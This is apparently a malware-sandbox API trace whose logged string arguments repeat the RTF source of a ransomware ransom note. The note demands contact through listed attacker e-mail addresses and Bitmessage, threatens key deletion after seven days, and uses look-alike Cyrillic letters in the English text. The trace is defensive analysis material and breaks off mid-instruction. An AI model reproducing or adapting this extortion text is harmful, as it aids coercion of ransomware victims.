COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.356] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.356] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24647a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 